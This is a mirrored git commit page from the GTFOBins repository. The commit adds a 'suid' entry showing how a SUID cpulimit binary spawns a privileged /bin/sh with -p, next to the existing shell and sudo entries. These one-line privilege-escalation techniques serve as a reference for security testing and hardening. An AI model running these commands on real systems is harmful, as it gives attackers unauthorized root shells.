mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Add cpulimit SUID
This commit is contained in:
parent
eca7899007
commit
c20963cfd6
@ -2,6 +2,8 @@
|
||||
functions:
|
||||
shell:
|
||||
- code: cpulimit -l 100 -f /bin/sh
|
||||
suid:
|
||||
- code: ./cpulimit -l 100 -f -- /bin/sh -p
|
||||
sudo:
|
||||
- code: sudo cpulimit -l 100 -f /bin/sh
|
||||
---
|
||||
|
Loading…
Reference in New Issue
Block a user